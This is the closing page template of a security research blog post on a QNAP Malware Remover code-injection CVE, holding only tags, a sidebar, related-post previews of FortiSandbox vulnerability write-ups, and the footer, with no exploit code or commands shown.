        <i class="far fa-folder-open fa-fw me-1"></i>
        
          <a href="/categories/vulnerability/">vulnerability</a>
      </div>
    

    <!-- tags -->
    
      <div class="post-tags">
        <i class="fa fa-tags fa-fw me-1"></i>
        
          <a
            href="/tags/cve/"
            class="post-tag no-text-decoration"
          >CVE</a>
        
      </div>
    

    <div
      class="
        post-tail-bottom
        d-flex justify-content-between align-items-center mt-5 pb-2
      "
    >
      <div class="license-wrapper">
        
          

          This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.
        
      </div>

      <!-- Post sharing snippet -->

<div class="share-wrapper d-flex align-items-center">
  <span class="share-label text-muted">Share</span>
  <span class="share-icons">
    
    
    

    

      

      <a href="https://twitter.com/intent/tweet?text=CVE-2025-11837%20%E6%B7%B1%E5%BA%A6%E5%88%86%E6%9E%90%EF%BC%9AQNAP%20Malware%20Remover%20Python%20%E4%BB%A3%E7%A0%81%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20-%20imjdl%20blog&url=%2Fposts%2Fblog_cve_2025_11837_cn%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter" aria-label="Twitter">
        <i class="fa-fw fa-brands fa-square-x-twitter"></i>
      </a>
    

      

      <a href="https://www.facebook.com/sharer/sharer.php?title=CVE-2025-11837%20%E6%B7%B1%E5%BA%A6%E5%88%86%E6%9E%90%EF%BC%9AQNAP%20Malware%20Remover%20Python%20%E4%BB%A3%E7%A0%81%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20-%20imjdl%20blog&u=%2Fposts%2Fblog_cve_2025_11837_cn%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Facebook" aria-label="Facebook">
        <i class="fa-fw fab fa-facebook-square"></i>
      </a>
    

      

      <a href="https://t.me/share/url?url=%2Fposts%2Fblog_cve_2025_11837_cn%2F&text=CVE-2025-11837%20%E6%B7%B1%E5%BA%A6%E5%88%86%E6%9E%90%EF%BC%9AQNAP%20Malware%20Remover%20Python%20%E4%BB%A3%E7%A0%81%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20-%20imjdl%20blog" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Telegram" aria-label="Telegram">
        <i class="fa-fw fab fa-telegram"></i>
      </a>
    

    <button
      id="copy-link"
      aria-label="Copy link"
      class="btn small"
      data-bs-toggle="tooltip"
      data-bs-placement="top"
      title="Copy link"
      data-title-succeed="Link copied successfully!"
    >
      <i class="fa-fw fas fa-link pe-none fs-6"></i>
    </button>
  </span>
</div>

    </div>
    <!-- .post-tail-bottom -->
  </div>
  <!-- div.post-tail-wrapper -->
</article>


            
          </main>

          <!-- panel -->
          <aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 text-muted">
            <div class="access">
              <!-- Get 5 last posted/updated posts -->














  <section id="access-lastmod">
    <h2 class="panel-heading">Recently Updated</h2>
    <ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2">
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/blog_cve_2025_11837_cn/">CVE-2025-11837 深度分析：QNAP Malware Remover Python 代码注入漏洞</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/blog_cve_2025_11837_en/">CVE-2025-11837 Deep Dive Python Code Injection Vulnerability in QNAP Malware Remover</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/blog_backup_decryption_cn/">FortiSandbox 备份配置文件解密：固件逆向发现硬编码加密密钥</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/blog_backup_decryption_en/">Hardcoded Encryption Key in FortiSandbox Firmware Decrypting System Backups from First Principles</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/blog_cve_2026_39813_en/">CVE-2026-39813 Deep Dive Path Traversal Authentication Bypass in FortiSandbox JRPC API</a>
        </li>
      
    </ul>
  </section>
  <!-- #access-lastmod -->


              <!-- The trending tags list -->















  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/cve/">CVE</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/rce/">RCE</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/%E7%A9%BA%E9%97%B4%E6%B5%8B%E7%BB%98/">空间测绘</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/fortigate/">Fortigate</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/ivanti/">IVanti</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/mcp/">MCP</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/palo-alto-networks-pan-os/">Palo-Alto-Networks-PAN-OS</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/showdoc/">ShowDoc</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/simplehelp/">SimpleHelp</a>
      
    </div>
  </section>


            </div>

            
              
              






  <div class="toc-border-cover z-3"></div>
  <section id="toc-wrapper" class="invisible position-sticky ps-0 pe-4 pb-4">
    <h2 class="panel-heading ps-3 pb-2 mb-0">Contents</h2>
    <nav id="toc"></nav>
  </section>


            
          </aside>
        </div>

        <div class="row">
          <!-- tail -->
          <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              
              <!-- Recommend the other 3 posts according to the tags and categories of the current post. -->

<!-- The total size of related posts -->


<!-- An random integer that bigger than 0 -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy} -->















  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
    
  

  

  

  

  

  











  <aside id="related-posts" aria-labelledby="related-label">
    <h3 class="mb-4" id="related-label">Further Reading</h3>
    <nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4">
      
        <article class="col">
          <a href="/posts/blog_cve_2025_11837_en/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1782102840"
  data-df="ll"
  
>
  Jun 22, 2026
</time>

              <h4 class="pt-0 my-2">CVE-2025-11837 Deep Dive Python Code Injection Vulnerability in QNAP Malware Remover</h4>
              <div class="text-muted">
                <p>Background

CVE-2025-11837 affects QNAP Malware Remover. It carries a CVSS 9.8 score and is tagged as network-reachable, no authentication required, no user interaction. The vulnerability was first...</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/blog_backup_decryption_en/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1781238840"
  data-df="ll"
  
>
  Jun 12, 2026
</time>

              <h4 class="pt-0 my-2">Hardcoded Encryption Key in FortiSandbox Firmware Decrypting System Backups from First Principles</h4>
              <div class="text-muted">
                <p>How firmware reverse engineering revealed a hardcoded AES-256-CBC passphrase shared across all FortiSandbox devices — and why the 4.4.9 patch did nothing to fix it


Background

In our previous art...</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/blog_backup_decryption_cn/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1781238840"
  data-df="ll"
  
>
  Jun 12, 2026
</time>

              <h4 class="pt-0 my-2">FortiSandbox 备份配置文件解密：固件逆向发现硬编码加密密钥</h4>
              <div class="text-muted">
                <p>通过固件逆向提取 FortiSandbox 备份加密的硬编码密码，还原完整的备份解密攻击链


背景

在上一篇文章中，我们分析了 CVE-2026-39813（JRPC 路径遍历认证绕过），发现攻击者可以通过 backup/config 端点未授权下载 32KB 的加密系统备份。该备份以 OpenSSL Salted__ 格式存储，使用 AES-256-CBC 加密。当时我们提到如果能获取...</p>
              </div>
            </div>
          </a>
        </article>
      
    </nav>
  </aside>
  <!-- #related-posts -->


            
              
              <!-- Navigation buttons at the bottom of the post. -->

<nav class="post-navigation d-flex justify-content-between" aria-label="Post Navigation">
  
  

  
    <a
      href="/posts/blog_backup_decryption_en/"
      class="btn btn-outline-primary"
      aria-label="Older"
    >
      <p>Hardcoded Encryption Key in FortiSandbox Firmware Decrypting System Backups from First Principles</p>
    </a>
  

  
    <a
      href="/posts/blog_cve_2025_11837_en/"
      class="btn btn-outline-primary"
      aria-label="Newer"
    >
      <p>CVE-2025-11837 Deep Dive Python Code Injection Vulnerability in QNAP Malware Remover</p>
    </a>
  
</nav>

            

            <!-- The Footer -->

<footer
  aria-label="Site Info"
  class="
    d-flex flex-column justify-content-center text-muted
    flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3
  "
>
  <p>©
    <time>2026</time>

    
      <a href="https://twitter.com/Mortyjin">Mortyjin</a>.
    

    
      <span
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author."
      >Some rights reserved.</span>
    
  </p>

  <p>Using the <a
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="v7.2.4"
        href="https://github.com/cotes2020/jekyll-theme-chirpy"
        target="_blank"
        rel="noopener"
      >Chirpy</a> theme for <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>.
  </p>
</footer>

          </div>
        </div>

        <!-- The Search results -->

<div id="search-result-wrapper" class="d-flex justify-content-center d-none">
  <div class="col-11 content">
    <div id="search-hints">
      <!-- The trending tags list -->















  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/cve/">CVE</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/rce/">RCE</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/%E7%A9%BA%E9%97%B4%E6%B5%8B%E7%BB%98/">空间测绘</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/fortigate/">Fortigate</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/ivanti/">IVanti</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/mcp/">MCP</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/palo-alto-networks-pan-os/">Palo-Alto-Networks-PAN-OS</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/showdoc/">ShowDoc</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/simplehelp/">SimpleHelp</a>
      
    </div>
  </section>


    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

      </div>

      <aside aria-label="Scroll to Top">
        <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow">
          <i class="fas fa-angle-up"></i>
        </button>
      </aside>
    </div>

    <div id="mask" class="d-none position-fixed w-100 h-100 z-1"></div>

    
      <aside
  id="notification"
  class="toast"
  role="alert"
  aria-live="assertive"
  aria-atomic="true"
  data-bs-animation="true"
  data-bs-autohide="false"
>
  <div class="toast-header">
    <button
      type="button"
      class="btn-close ms-auto"
      data-bs-dismiss="toast"
      aria-label="Close"
    ></button>
  </div>
  <div class="toast-body text-center pt-0">
    <p class="px-2 mb-3">A new version of content is available.</p>
    <button type="button" class="btn btn-primary" aria-label="Update">
      Update
    </button>
  </div>
</aside>

    

    <!-- Embedded scripts -->

    
      
      <!-- The comments switcher -->


    

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script>
  
  document.addEventListener('DOMContentLoaded', () => {
    SimpleJekyllSearch({
      searchInput: document.getElementById('search-input'),
      resultsContainer: document.getElementById('search-results'),
      json: '/assets/js/data/search.json',
      searchResultTemplate: '  <article class="px-1 px-sm-2 px-lg-4 px-xl-0">    <header>      <h2><a href="{url}">{title}</a></h2>      <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">        {categories}        {tags}      </div>    </header>    <p>{snippet}</p>  </article>',
      noResultsText: '<p class="mt-5">Oops! No results found.</p>',
      templateMiddleware: function(prop, value, template) {
        if (prop === 'categories') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
          }
        }

        if (prop === 'tags') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
          }
        }
      }
    });
  });
</script>

  </body>
</html>

